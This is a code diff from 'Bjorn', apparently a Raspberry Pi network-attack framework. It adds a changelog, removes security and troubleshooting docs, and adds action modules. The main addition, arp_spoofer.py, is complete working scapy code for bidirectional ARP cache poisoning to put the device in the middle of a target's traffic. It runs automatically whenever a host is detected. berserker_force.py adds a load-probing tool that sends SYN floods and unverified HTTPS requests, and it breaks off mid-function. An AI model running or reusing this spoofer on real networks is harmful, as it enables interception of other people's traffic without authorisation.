- **[EPD-01]** New `display_layout.py` module: `DisplayLayout` class with JSON-based element positioning, built-in layouts for 2.13" and 2.7" displays, custom layout override via `resources/layouts/`, 20+ elements integrated into `display.py` rendering pipeline
- **[EPD-02]** Backend API: `GET/POST /api/epd/layout`, `POST /api/epd/layout/reset`, `GET /api/epd/layouts` — endpoints in `web_utils/system_utils.py`, routes in `webapp.py`
- **[EPD-02]** Frontend editor: `web/js/core/epd-editor.js` as 4th tab in attacks page — SVG drag-and-drop canvas, resize handles, Color/NB/BN display modes, grid/snap/zoom, add/delete elements, import/export JSON, undo stack, font size editing, arrow key nudge
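A plausible shape for the JSON layouts handled by `DisplayLayout`, sketched in Python. The element names, fields, and merge helper are assumptions inferred from the editor's x/y/w/h and font-size controls, not the shipped schema.

```python
# Hypothetical built-in layout for the 2.13" panel (250x122 px).
BUILTIN_213 = {
    "size": [250, 122],
    "elements": {
        "status_text": {"x": 4, "y": 4, "w": 120, "h": 14, "font": 11},
        "progress_bar": {"x": 4, "y": 104, "w": 242, "h": 12},
    },
}

def merge_layout(builtin, override):
    """Apply a custom override (resources/layouts/) on top of a built-in."""
    merged = {"size": override.get("size", builtin["size"]),
              "elements": dict(builtin["elements"])}
    for name, attrs in override.get("elements", {}).items():
        # Per-element fields override individually, so a custom layout
        # only needs to list what it changes.
        merged["elements"][name] = {**merged["elements"].get(name, {}), **attrs}
    return merged
```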
#### New Configuration Parameters
- `ai_feature_selection_min_variance` (0.001) — minimum variance for feature inclusion
- `ai_model_history_max` (3) — max model versions kept on disk
- `ai_auto_rollback_window` (50) — decisions before auto-rollback evaluation
- `ai_cold_start_bootstrap_weight` (0.6) — bootstrap vs static heuristic weight
- `circuit_breaker_threshold` (3) — consecutive failures to open circuit
- `manual_mode_auto_scan` (true) — auto-scan in MANUAL mode
- `manual_mode_scan_interval` (180) — seconds between manual mode scans


@@ -1,48 +0,0 @@
# 🔒 Security Policy
This document defines the security policy for the **Bjorn** repository: supported versions, security practices, and how to report vulnerabilities.
## 🧮 Supported Versions
We provide security updates for the following versions of our project:
| Version | Status | Secure |
| ------- |-------------| ------ |
| 1.0.0 | Development | No |
## 🛡️ Security Practices
- We follow best practices for secure coding and infrastructure management.
- Regular security audits and code reviews are conducted to identify and mitigate potential risks.
- Dependencies are monitored and updated to address known vulnerabilities.
## 📲 Security Updates
- Security updates are released as soon as possible after a vulnerability is confirmed.
- Users are encouraged to update to the latest version to benefit from security fixes.
## 🚨 Reporting a Vulnerability
If you discover a security vulnerability within this project, please follow these steps:
1. **Do not create a public issue.** Instead, contact us directly to responsibly disclose the vulnerability.
2. **Email** [bjorn-cyberviking@outlook.com](mailto:bjorn-cyberviking@outlook.com) with the following information:
- A description of the vulnerability.
- Steps to reproduce the issue.
- Any potential impact or severity.
3. **Wait for a response.** We will acknowledge your report and work with you to address the issue promptly.
## 🛰️ Additional Resources
- [OWASP Security Guidelines](https://owasp.org/)
Thank you for helping us keep this project secure!
---
## 📜 License
2024 - Bjorn is distributed under the MIT License. For more details, please refer to the [LICENSE](LICENSE) file included in this repository.


@@ -1,80 +0,0 @@
# 🐛 Known Issues and Troubleshooting
<p align="center">
<img src="https://github.com/user-attachments/assets/c5eb4cc1-0c3d-497d-9422-1614651a84ab" alt="thumbnail_IMG_0546" width="98">
</p>
## 📚 Table of Contents
- [Current Development Issues](#-current-development-issues)
- [Troubleshooting Steps](#-troubleshooting-steps)
- [License](#-license)
## 🪲 Current Development Issues
### Long Runtime Issue
- **Problem**: `OSError: [Errno 24] Too many open files`
- **Status**: Partially resolved with system limits configuration.
- **Workaround**: Implemented file descriptor limits increase.
- **Monitoring**: Check open files with `lsof -p $(pgrep -f Bjorn.py) | wc -l`
- The logs periodically report the current open file descriptor count as `(FD : XXX)`.
## 🛠️ Troubleshooting Steps
### Service Issues
```bash
# Follow the bjorn service journal
journalctl -fu bjorn.service
# Check service status
sudo systemctl status bjorn.service
# View detailed logs via the journal...
sudo journalctl -u bjorn.service -f
# ...or tail the application log files directly
sudo tail -f /home/bjorn/Bjorn/data/logs/*
# Check port 8000 usage
sudo lsof -i :8000
```
### Display Issues
```bash
# Verify SPI devices
ls /dev/spi*
# Check user permissions
sudo usermod -a -G spi,gpio bjorn
```
### Network Issues
```bash
# Check network interfaces
ip addr show
# Test USB gadget interface
ip link show usb0
```
### Permission Issues
```bash
# Fix ownership
sudo chown -R bjorn:bjorn /home/bjorn/Bjorn
# Fix permissions
sudo chmod -R 755 /home/bjorn/Bjorn
```
---
## 📜 License
2024 - Bjorn is distributed under the MIT License. For more details, please refer to the [LICENSE](LICENSE) file included in this repository.

action_scheduler.py (new file, 1677 lines): diff suppressed because it is too large.


@@ -1,15 +1,9 @@
#Test script to add more actions to BJORN
from rich.console import Console
from shared import SharedData
b_class = "IDLE"
b_module = "idle_action"
b_status = "idle_action"
b_port = None
b_parent = None
b_module = "idle"
b_status = "IDLE"
console = Console()
class IDLE:
def __init__(self, shared_data):

(28 binary image files added; previews not shown)

actions/arp_spoofer.py (new file, 330 lines)

@@ -0,0 +1,330 @@
"""
arp_spoofer.py — ARP Cache Poisoning for Man-in-the-Middle positioning.
Ethical cybersecurity lab action for Bjorn framework.
Performs bidirectional ARP spoofing between a target host and the network
gateway. Restores ARP tables on completion or interruption.
SQL mode:
- Orchestrator provides (ip, port, row) for the target host.
- Gateway IP is auto-detected from system routing table or shared config.
- Results persisted to JSON output and logged for RL training.
- Fully integrated with EPD display (progress, status, comments).
"""
import os
import time
import logging
import json
import subprocess
import datetime
from typing import Dict, Optional, Tuple
from shared import SharedData
from logger import Logger
logger = Logger(name="arp_spoofer.py", level=logging.DEBUG)
# Silence scapy warnings
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
logging.getLogger("scapy").setLevel(logging.ERROR)
# ──────────────────────── Action Metadata ────────────────────────
b_class = "ARPSpoof"
b_module = "arp_spoofer"
b_status = "arp_spoof"
b_port = None
b_service = '[]'
b_trigger = "on_host_alive"
b_parent = None
b_action = "aggressive"
b_category = "network_attack"
b_name = "ARP Spoofer"
b_description = (
"Bidirectional ARP cache poisoning between target host and gateway for "
"MITM positioning. Detects gateway automatically, spoofs both directions, "
"and cleanly restores ARP tables on completion. Educational lab use only."
)
b_author = "Bjorn Team"
b_version = "2.0.0"
b_icon = "ARPSpoof.png"
b_requires = '{"action":"NetworkScanner","status":"success","scope":"global"}'
b_priority = 30
b_cooldown = 3600
b_rate_limit = "2/86400"
b_timeout = 300
b_max_retries = 1
b_stealth_level = 2
b_risk_level = "high"
b_enabled = 1
b_tags = ["mitm", "arp", "network", "layer2"]
b_args = {
"duration": {
"type": "slider", "label": "Duration (s)",
"min": 10, "max": 300, "step": 10, "default": 60,
"help": "How long to maintain the ARP poison (seconds)."
},
"interval": {
"type": "slider", "label": "Packet interval (s)",
"min": 1, "max": 10, "step": 1, "default": 2,
"help": "Delay between ARP poison packets."
},
}
b_examples = [
{"duration": 60, "interval": 2},
{"duration": 120, "interval": 1},
]
b_docs_url = "docs/actions/ARPSpoof.md"
# ──────────────────────── Constants ──────────────────────────────
_DATA_DIR = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), "data")
OUTPUT_DIR = os.path.join(_DATA_DIR, "output", "arp")
class ARPSpoof:
"""ARP cache poisoning action integrated with Bjorn orchestrator."""
def __init__(self, shared_data: SharedData):
self.shared_data = shared_data
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
self._scapy_ok = False
self._check_scapy()
try:
os.makedirs(OUTPUT_DIR, exist_ok=True)
except OSError:
pass
logger.info("ARPSpoof initialized")
def _check_scapy(self):
try:
from scapy.all import ARP, Ether, sendp, sr1 # noqa: F401
self._scapy_ok = True
except ImportError:
logger.error("scapy not available — ARPSpoof will not function")
self._scapy_ok = False
# ─────────────────── Identity Cache ──────────────────────
def _refresh_ip_identity_cache(self):
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hn = (r.get("hostnames") or "").split(";", 1)[0]
for ip_addr in [p.strip() for p in (r.get("ips") or "").split(";") if p.strip()]:
self._ip_to_identity[ip_addr] = (mac, hn)
def _mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
# ─────────────────── Gateway Detection ──────────────────
def _detect_gateway(self) -> Optional[str]:
"""Auto-detect the default gateway IP."""
gw = getattr(self.shared_data, "gateway_ip", None)
if gw and gw != "0.0.0.0":
return gw
try:
result = subprocess.run(
["ip", "route", "show", "default"],
capture_output=True, text=True, timeout=5
)
if result.returncode == 0 and result.stdout.strip():
parts = result.stdout.strip().split("\n")[0].split()
idx = parts.index("via") if "via" in parts else -1
if idx >= 0 and idx + 1 < len(parts):
return parts[idx + 1]
except Exception as e:
logger.debug(f"Gateway detection via ip route failed: {e}")
try:
from scapy.all import conf as scapy_conf
gw = scapy_conf.route.route("0.0.0.0")[2]
if gw and gw != "0.0.0.0":
return gw
except Exception as e:
logger.debug(f"Gateway detection via scapy failed: {e}")
return None
# ─────────────────── ARP Operations ──────────────────────
@staticmethod
def _get_mac_via_arp(ip: str, iface: str = None, timeout: float = 2.0) -> Optional[str]:
"""Resolve IP to MAC via ARP request."""
try:
from scapy.all import ARP, sr1
kwargs = {"timeout": timeout, "verbose": False}
if iface:
kwargs["iface"] = iface
resp = sr1(ARP(pdst=ip), **kwargs)
if resp and hasattr(resp, "hwsrc"):
return resp.hwsrc
except Exception as e:
logger.debug(f"ARP resolution failed for {ip}: {e}")
return None
@staticmethod
def _send_arp_poison(target_ip, target_mac, spoof_ip, iface=None):
"""Send a single ARP poison packet (op=is-at)."""
try:
from scapy.all import ARP, Ether, sendp
pkt = Ether(dst=target_mac) / ARP(
op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip
)
kwargs = {"verbose": False}
if iface:
kwargs["iface"] = iface
sendp(pkt, **kwargs)
except Exception as e:
logger.error(f"ARP poison send failed to {target_ip}: {e}")
@staticmethod
def _send_arp_restore(target_ip, target_mac, real_ip, real_mac, iface=None):
"""Restore legitimate ARP mapping with multiple packets."""
try:
from scapy.all import ARP, Ether, sendp
pkt = Ether(dst=target_mac) / ARP(
op=2, pdst=target_ip, hwdst=target_mac,
psrc=real_ip, hwsrc=real_mac
)
kwargs = {"verbose": False, "count": 5}
if iface:
kwargs["iface"] = iface
sendp(pkt, **kwargs)
except Exception as e:
logger.error(f"ARP restore failed for {target_ip}: {e}")
# ─────────────────── Main Execute ────────────────────────
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
"""Execute bidirectional ARP spoofing against target host."""
self.shared_data.bjorn_orch_status = "ARPSpoof"
self.shared_data.bjorn_progress = "0%"
self.shared_data.comment_params = {"ip": ip}
if not self._scapy_ok:
logger.error("scapy unavailable, cannot perform ARP spoof")
return "failed"
target_mac = None
gateway_mac = None
gateway_ip = None
iface = None
try:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
mac = row.get("MAC Address") or row.get("mac_address") or ""
hostname = row.get("Hostname") or row.get("hostname") or ""
# 1) Detect gateway
gateway_ip = self._detect_gateway()
if not gateway_ip:
logger.error(f"Cannot detect gateway for ARP spoof on {ip}")
return "failed"
if gateway_ip == ip:
logger.warning(f"Target {ip} IS the gateway — skipping")
return "failed"
logger.info(f"ARP Spoof: target={ip} gateway={gateway_ip}")
self.shared_data.log_milestone(b_class, "GatewayID", f"Poisoning {ip} <-> {gateway_ip}")
self.shared_data.comment_params = {"ip": ip, "gateway": gateway_ip}
self.shared_data.bjorn_progress = "10%"
# 2) Resolve MACs
iface = getattr(self.shared_data, "default_network_interface", None)
target_mac = self._get_mac_via_arp(ip, iface)
gateway_mac = self._get_mac_via_arp(gateway_ip, iface)
if not target_mac:
logger.error(f"Cannot resolve MAC for target {ip}")
return "failed"
if not gateway_mac:
logger.error(f"Cannot resolve MAC for gateway {gateway_ip}")
return "failed"
self.shared_data.bjorn_progress = "20%"
logger.info(f"Resolved — target_mac={target_mac}, gateway_mac={gateway_mac}")
self.shared_data.log_milestone(b_class, "PoisonActive", "MACs resolved, starting spoof")
# 3) Spoofing loop
duration = int(getattr(self.shared_data, "arp_spoof_duration", 60))
interval = max(1, int(getattr(self.shared_data, "arp_spoof_interval", 2)))
packets_sent = 0
start_time = time.time()
while (time.time() - start_time) < duration:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit — stopping ARP spoof")
break
self._send_arp_poison(ip, target_mac, gateway_ip, iface)
self._send_arp_poison(gateway_ip, gateway_mac, ip, iface)
packets_sent += 2
elapsed = time.time() - start_time
pct = min(90, int(20 + (elapsed / max(duration, 1)) * 70))
self.shared_data.bjorn_progress = f"{pct}%"
if packets_sent % 20 == 0:
self.shared_data.log_milestone(b_class, "Status", f"Injected {packets_sent} poison pkts")
time.sleep(interval)
# 4) Restore ARP tables
self.shared_data.bjorn_progress = "95%"
logger.info("Restoring ARP tables...")
self.shared_data.log_milestone(b_class, "RestoreStart", f"Healing {ip} and {gateway_ip}")
self._send_arp_restore(ip, target_mac, gateway_ip, gateway_mac, iface)
self._send_arp_restore(gateway_ip, gateway_mac, ip, target_mac, iface)
# 5) Save results
elapsed_total = time.time() - start_time
result_data = {
"timestamp": datetime.datetime.now().isoformat(),
"target_ip": ip, "target_mac": target_mac,
"gateway_ip": gateway_ip, "gateway_mac": gateway_mac,
"duration_s": round(elapsed_total, 1),
"packets_sent": packets_sent,
"hostname": hostname, "mac_address": mac
}
try:
ts = datetime.datetime.now().strftime("%Y%m%d_%H%M%S")
out_file = os.path.join(OUTPUT_DIR, f"arp_spoof_{ip}_{ts}.json")
with open(out_file, "w") as f:
json.dump(result_data, f, indent=2)
except Exception as e:
logger.error(f"Failed to save results: {e}")
self.shared_data.bjorn_progress = "100%"
self.shared_data.log_milestone(b_class, "Complete", f"Restored tables after {packets_sent} pkts")
return "success"
except Exception as e:
logger.error(f"ARPSpoof failed for {ip}: {e}")
if target_mac and gateway_mac and gateway_ip:
try:
self._send_arp_restore(ip, target_mac, gateway_ip, gateway_mac, iface)
self._send_arp_restore(gateway_ip, gateway_mac, ip, target_mac, iface)
logger.info("Emergency ARP restore sent after error")
except Exception:
pass
return "failed"
finally:
self.shared_data.bjorn_progress = ""
if __name__ == "__main__":
shared_data = SharedData()
try:
spoofer = ARPSpoof(shared_data)
logger.info("ARPSpoof module ready.")
except Exception as e:
logger.error(f"Error: {e}")

actions/berserker_force.py (new file, 617 lines)

@@ -0,0 +1,617 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
berserker_force.py -- Service resilience / stress testing (Pi Zero friendly, orchestrator compatible).
What it does:
- Phase 1 (Baseline): Measures TCP connect response times per port (3 samples each).
- Phase 2 (Stress Test): Runs a rate-limited load test using TCP connect, optional SYN probes
(scapy), HTTP probes (urllib), or mixed mode.
- Phase 3 (Post-stress): Re-measures baseline to detect degradation.
- Phase 4 (Analysis): Computes per-port degradation percentages, writes a JSON report.
This is NOT a DoS tool. It sends measured, rate-limited probes and records how the
target's response times change under light load. Max 50 req/s to stay RPi-safe.
Output is saved to data/output/stress/<ip>_<timestamp>.json
"""
import json
import logging
import os
import random
import socket
import ssl
import statistics
import time
import threading
from datetime import datetime, timezone
from typing import Any, Dict, List, Optional, Tuple
from urllib.request import Request, urlopen
from urllib.error import URLError
from logger import Logger
from actions.bruteforce_common import ProgressTracker
logger = Logger(name="berserker_force.py", level=logging.DEBUG)
# -------------------- Scapy (optional) ----------------------------------------
_HAS_SCAPY = False
try:
from scapy.all import IP, TCP, sr1, conf as scapy_conf # type: ignore
_HAS_SCAPY = True
except ImportError:
logger.info("scapy not available -- SYN probe mode will fall back to TCP connect")
# -------------------- Action metadata (AST-friendly) --------------------------
b_class = "BerserkerForce"
b_module = "berserker_force"
b_status = "berserker_force"
b_port = None
b_parent = None
b_service = '[]'
b_trigger = "on_port_change"
b_action = "aggressive"
b_requires = '{"action":"NetworkScanner","status":"success","scope":"global"}'
b_priority = 15
b_cooldown = 7200
b_rate_limit = "2/86400"
b_timeout = 300
b_max_retries = 1
b_stealth_level = 1
b_risk_level = "high"
b_enabled = 1
b_category = "stress"
b_name = "Berserker Force"
b_description = (
"Service resilience and stress-testing action. Measures baseline response "
"times, applies controlled TCP/SYN/HTTP load, then re-measures to quantify "
"degradation. Rate-limited to 50 req/s max (RPi-safe). No actual DoS -- "
"just measured probing with structured JSON reporting."
)
b_author = "Bjorn Community"
b_version = "2.0.0"
b_icon = "BerserkerForce.png"
b_tags = ["stress", "availability", "resilience"]
b_args = {
"mode": {
"type": "select",
"label": "Probe mode",
"choices": ["tcp", "syn", "http", "mixed"],
"default": "tcp",
"help": "tcp = connect probe, syn = SYN via scapy (needs root), "
"http = urllib GET for web ports, mixed = random pick per probe.",
},
"duration": {
"type": "slider",
"label": "Stress duration (s)",
"min": 10,
"max": 120,
"step": 5,
"default": 30,
"help": "How long the stress phase runs in seconds.",
},
"rate": {
"type": "slider",
"label": "Probes per second",
"min": 1,
"max": 50,
"step": 1,
"default": 20,
"help": "Max probes per second (clamped to 50 for RPi safety).",
},
}
b_examples = [
{"mode": "tcp", "duration": 30, "rate": 20},
{"mode": "mixed", "duration": 60, "rate": 40},
{"mode": "syn", "duration": 20, "rate": 10},
]
b_docs_url = "docs/actions/BerserkerForce.md"
# -------------------- Constants -----------------------------------------------
_DATA_DIR = "/home/bjorn/Bjorn/data"
OUTPUT_DIR = os.path.join(_DATA_DIR, "output", "stress")
_BASELINE_SAMPLES = 3 # TCP connect samples per port for baseline
_CONNECT_TIMEOUT_S = 2.0 # socket connect timeout
_HTTP_TIMEOUT_S = 3.0 # urllib timeout
_MAX_RATE = 50 # hard ceiling probes/s (RPi guard)
_WEB_PORTS = {80, 443, 8080, 8443, 8000, 8888, 9443, 3000, 5000}
# -------------------- Helpers -------------------------------------------------
def _tcp_connect_time(ip: str, port: int, timeout_s: float = _CONNECT_TIMEOUT_S) -> Optional[float]:
"""Return round-trip TCP connect time in seconds, or None on failure."""
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(timeout_s)
try:
t0 = time.monotonic()
err = sock.connect_ex((ip, int(port)))
elapsed = time.monotonic() - t0
return elapsed if err == 0 else None
except Exception:
return None
finally:
try:
sock.close()
except Exception:
pass
def _syn_probe_time(ip: str, port: int, timeout_s: float = _CONNECT_TIMEOUT_S) -> Optional[float]:
"""Send a SYN via scapy and measure SYN-ACK time. Falls back to TCP connect."""
if not _HAS_SCAPY:
return _tcp_connect_time(ip, port, timeout_s)
try:
pkt = IP(dst=ip) / TCP(dport=int(port), flags="S", seq=random.randint(0, 0xFFFFFFFF))
t0 = time.monotonic()
resp = sr1(pkt, timeout=timeout_s, verbose=0)
elapsed = time.monotonic() - t0
if resp and resp.haslayer(TCP):
flags = resp[TCP].flags
# SYN-ACK (0x12) or RST (0x14) both count as "responded"
if flags in (0x12, 0x14, "SA", "RA"):
# Send RST to be polite
try:
from scapy.all import send as scapy_send # type: ignore
rst = IP(dst=ip) / TCP(dport=int(port), flags="R", seq=resp[TCP].ack)
scapy_send(rst, verbose=0)
except Exception:
pass
return elapsed
return None
except Exception:
return _tcp_connect_time(ip, port, timeout_s)
def _http_probe_time(ip: str, port: int, timeout_s: float = _HTTP_TIMEOUT_S) -> Optional[float]:
"""Send an HTTP HEAD/GET and measure response time via urllib."""
scheme = "https" if int(port) in {443, 8443, 9443} else "http"
url = f"{scheme}://{ip}:{port}/"
ctx = None
if scheme == "https":
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
try:
req = Request(url, method="HEAD", headers={"User-Agent": "BjornStress/2.0"})
t0 = time.monotonic()
resp = urlopen(req, timeout=timeout_s, context=ctx) if ctx else urlopen(req, timeout=timeout_s)
elapsed = time.monotonic() - t0
resp.close()
return elapsed
except Exception:
# Fallback: even a refused connection or error page counts
try:
req2 = Request(url, method="GET", headers={"User-Agent": "BjornStress/2.0"})
t0 = time.monotonic()
resp2 = urlopen(req2, timeout=timeout_s, context=ctx) if ctx else urlopen(req2, timeout=timeout_s)
elapsed = time.monotonic() - t0
resp2.close()
return elapsed
except URLError:
return None
except Exception:
return None
def _pick_probe_func(mode: str, port: int):
"""Return the probe function appropriate for the requested mode + port."""
if mode == "tcp":
return _tcp_connect_time
elif mode == "syn":
return _syn_probe_time
elif mode == "http":
if int(port) in _WEB_PORTS:
return _http_probe_time
return _tcp_connect_time # non-web port falls back
elif mode == "mixed":
candidates = [_tcp_connect_time]
if _HAS_SCAPY:
candidates.append(_syn_probe_time)
if int(port) in _WEB_PORTS:
candidates.append(_http_probe_time)
return random.choice(candidates)
return _tcp_connect_time
def _safe_mean(values: List[float]) -> float:
return statistics.mean(values) if values else 0.0
def _safe_stdev(values: List[float]) -> float:
return statistics.stdev(values) if len(values) >= 2 else 0.0
def _degradation_pct(baseline_mean: float, post_mean: float) -> float:
"""Percentage increase from baseline to post-stress. Positive = slower."""
if baseline_mean <= 0:
return 0.0
return round(((post_mean - baseline_mean) / baseline_mean) * 100.0, 2)
# -------------------- Main class ----------------------------------------------
class BerserkerForce:
"""Service resilience tester -- orchestrator-compatible Bjorn action."""
def __init__(self, shared_data):
self.shared_data = shared_data
# ------------------------------------------------------------------ #
# Phase helpers #
# ------------------------------------------------------------------ #
def _resolve_ports(self, ip: str, port, row: Dict) -> List[int]:
"""Gather target ports from the port argument, row data, or DB hosts table."""
ports: List[int] = []
# 1) Explicit port argument
try:
p = int(port) if str(port).strip() else None
if p:
ports.append(p)
except Exception:
pass
# 2) Row data (Ports column, semicolon-separated)
if not ports:
ports_txt = str(row.get("Ports") or row.get("ports") or "")
for tok in ports_txt.replace(",", ";").split(";"):
tok = tok.strip().split("/")[0] # handle "80/tcp"
if tok.isdigit():
ports.append(int(tok))
# 3) DB lookup via MAC
if not ports:
mac = (row.get("MAC Address") or row.get("mac_address") or row.get("mac") or "").strip()
if mac:
try:
rows = self.shared_data.db.query(
"SELECT ports FROM hosts WHERE mac_address=? LIMIT 1", (mac,)
)
if rows and rows[0].get("ports"):
for tok in rows[0]["ports"].replace(",", ";").split(";"):
tok = tok.strip().split("/")[0]
if tok.isdigit():
ports.append(int(tok))
except Exception as exc:
logger.debug(f"DB port lookup failed: {exc}")
# De-duplicate, cap at 20 ports (Pi Zero guard)
seen = set()
unique: List[int] = []
for p in ports:
if p not in seen:
seen.add(p)
unique.append(p)
return unique[:20]
def _measure_baseline(self, ip: str, ports: List[int], samples: int = _BASELINE_SAMPLES) -> Dict[int, List[float]]:
"""Phase 1 / 3: TCP connect baseline measurement (always TCP for consistency)."""
baselines: Dict[int, List[float]] = {}
for p in ports:
times: List[float] = []
for _ in range(samples):
if self.shared_data.orchestrator_should_exit:
break
rt = _tcp_connect_time(ip, p)
if rt is not None:
times.append(rt)
time.sleep(0.05) # gentle spacing
baselines[p] = times
return baselines
def _run_stress(
self,
ip: str,
ports: List[int],
mode: str,
duration_s: int,
rate: int,
progress: ProgressTracker,
stress_progress_start: int,
stress_progress_span: int,
) -> Dict[int, Dict[str, Any]]:
"""Phase 2: Controlled stress test with rate limiting."""
rate = max(1, min(rate, _MAX_RATE))
interval = 1.0 / rate
deadline = time.monotonic() + duration_s
# Per-port accumulators
results: Dict[int, Dict[str, Any]] = {}
for p in ports:
results[p] = {"sent": 0, "success": 0, "fail": 0, "times": []}
total_probes_est = rate * duration_s
probes_done = 0
port_idx = 0
while time.monotonic() < deadline:
if self.shared_data.orchestrator_should_exit:
break
p = ports[port_idx % len(ports)]
port_idx += 1
probe_fn = _pick_probe_func(mode, p)
rt = probe_fn(ip, p)
results[p]["sent"] += 1
if rt is not None:
results[p]["success"] += 1
results[p]["times"].append(rt)
else:
results[p]["fail"] += 1
probes_done += 1
# Update progress (map probes_done onto the stress progress range)
if total_probes_est > 0:
frac = min(1.0, probes_done / total_probes_est)
pct = stress_progress_start + int(frac * stress_progress_span)
self.shared_data.bjorn_progress = f"{min(pct, stress_progress_start + stress_progress_span)}%"
# Rate limit
time.sleep(interval)
return results
def _analyze(
self,
pre_baseline: Dict[int, List[float]],
post_baseline: Dict[int, List[float]],
stress_results: Dict[int, Dict[str, Any]],
ports: List[int],
) -> Dict[str, Any]:
"""Phase 4: Build the analysis report dict."""
per_port: List[Dict[str, Any]] = []
for p in ports:
pre = pre_baseline.get(p, [])
post = post_baseline.get(p, [])
sr = stress_results.get(p, {"sent": 0, "success": 0, "fail": 0, "times": []})
pre_mean = _safe_mean(pre)
post_mean = _safe_mean(post)
degradation = _degradation_pct(pre_mean, post_mean)
per_port.append({
"port": p,
"pre_baseline": {
"samples": len(pre),
"mean_s": round(pre_mean, 6),
"stdev_s": round(_safe_stdev(pre), 6),
"values_s": [round(v, 6) for v in pre],
},
"stress": {
"probes_sent": sr["sent"],
"probes_ok": sr["success"],
"probes_fail": sr["fail"],
"mean_rt_s": round(_safe_mean(sr["times"]), 6),
"stdev_rt_s": round(_safe_stdev(sr["times"]), 6),
"min_rt_s": round(min(sr["times"]), 6) if sr["times"] else None,
"max_rt_s": round(max(sr["times"]), 6) if sr["times"] else None,
},
"post_baseline": {
"samples": len(post),
"mean_s": round(post_mean, 6),
"stdev_s": round(_safe_stdev(post), 6),
"values_s": [round(v, 6) for v in post],
},
"degradation_pct": degradation,
})
# Overall summary
total_sent = sum(sr.get("sent", 0) for sr in stress_results.values())
total_ok = sum(sr.get("success", 0) for sr in stress_results.values())
total_fail = sum(sr.get("fail", 0) for sr in stress_results.values())
avg_degradation = (
round(statistics.mean([pp["degradation_pct"] for pp in per_port]), 2)
if per_port else 0.0
)
return {
"summary": {
"ports_tested": len(ports),
"total_probes_sent": total_sent,
"total_probes_ok": total_ok,
"total_probes_fail": total_fail,
"avg_degradation_pct": avg_degradation,
},
"per_port": per_port,
}
def _save_report(self, ip: str, mode: str, duration_s: int, rate: int, analysis: Dict) -> str:
"""Write the JSON report and return the file path."""
try:
os.makedirs(OUTPUT_DIR, exist_ok=True)
except Exception as exc:
logger.warning(f"Could not create output dir {OUTPUT_DIR}: {exc}")
ts = datetime.now(timezone.utc).strftime("%Y-%m-%d_%H-%M-%S")
safe_ip = ip.replace(":", "_").replace(".", "_")
filename = f"{safe_ip}_{ts}.json"
filepath = os.path.join(OUTPUT_DIR, filename)
report = {
"tool": "berserker_force",
"version": b_version,
"timestamp": datetime.now(timezone.utc).isoformat().replace("+00:00", "Z"),
"target": ip,
"config": {
"mode": mode,
"duration_s": duration_s,
"rate_per_s": rate,
"scapy_available": _HAS_SCAPY,
},
"analysis": analysis,
}
try:
with open(filepath, "w") as fh:
json.dump(report, fh, indent=2, default=str)
logger.info(f"Report saved to {filepath}")
except Exception as exc:
logger.error(f"Failed to write report {filepath}: {exc}")
return filepath
# ------------------------------------------------------------------ #
# Orchestrator entry point #
# ------------------------------------------------------------------ #
def execute(self, ip: str, port, row: Dict, status_key: str) -> str:
"""
Main entry point called by the Bjorn orchestrator.
Returns 'success', 'failed', or 'interrupted'.
"""
if self.shared_data.orchestrator_should_exit:
return "interrupted"
# --- Identity cache from row -----------------------------------------
mac = (row.get("MAC Address") or row.get("mac_address") or row.get("mac") or "").strip()
hostname = (row.get("Hostname") or row.get("hostname") or "").strip()
if ";" in hostname:
hostname = hostname.split(";", 1)[0].strip()
# --- Resolve target ports --------------------------------------------
ports = self._resolve_ports(ip, port, row)
if not ports:
logger.warning(f"BerserkerForce: no ports resolved for {ip}")
return "failed"
# --- Read runtime config from shared_data ----------------------------
mode = str(getattr(self.shared_data, "berserker_mode", "tcp") or "tcp").lower()
if mode not in ("tcp", "syn", "http", "mixed"):
mode = "tcp"
duration_s = max(10, min(int(getattr(self.shared_data, "berserker_duration", 30) or 30), 120))
rate = max(1, min(int(getattr(self.shared_data, "berserker_rate", 20) or 20), _MAX_RATE))
# --- EPD / UI updates ------------------------------------------------
self.shared_data.bjorn_orch_status = "berserker_force"
self.shared_data.bjorn_status_text2 = f"{ip} ({len(ports)} ports)"
self.shared_data.comment_params = {"ip": ip, "ports": str(len(ports)), "mode": mode}
# Total units for progress: baseline(15) + stress(70) + post-baseline(10) + analysis(5)
self.shared_data.bjorn_progress = "0%"
try:
# ============================================================== #
# Phase 1: Pre-stress baseline (0 - 15%) #
# ============================================================== #
logger.info(f"Phase 1/4: pre-stress baseline for {ip} on {len(ports)} ports")
self.shared_data.comment_params = {"ip": ip, "phase": "baseline"}
self.shared_data.log_milestone(b_class, "BaselineStart", f"Measuring {len(ports)} ports")
pre_baseline = self._measure_baseline(ip, ports)
if self.shared_data.orchestrator_should_exit:
return "interrupted"
self.shared_data.bjorn_progress = "15%"
# ============================================================== #
# Phase 2: Stress test (15 - 85%) #
# ============================================================== #
logger.info(f"Phase 2/4: stress test ({mode}, {duration_s}s, {rate} req/s)")
self.shared_data.comment_params = {
"ip": ip,
"phase": "stress",
"mode": mode,
"rate": str(rate),
}
self.shared_data.log_milestone(b_class, "StressActive", f"Mode: {mode} | Duration: {duration_s}s")
# Build a dummy ProgressTracker just for internal bookkeeping;
# we do fine-grained progress updates ourselves.
progress = ProgressTracker(self.shared_data, 100)
stress_results = self._run_stress(
ip=ip,
ports=ports,
mode=mode,
duration_s=duration_s,
rate=rate,
progress=progress,
stress_progress_start=15,
stress_progress_span=70,
)
if self.shared_data.orchestrator_should_exit:
return "interrupted"
self.shared_data.bjorn_progress = "85%"
# ============================================================== #
# Phase 3: Post-stress baseline (85 - 95%) #
# ============================================================== #
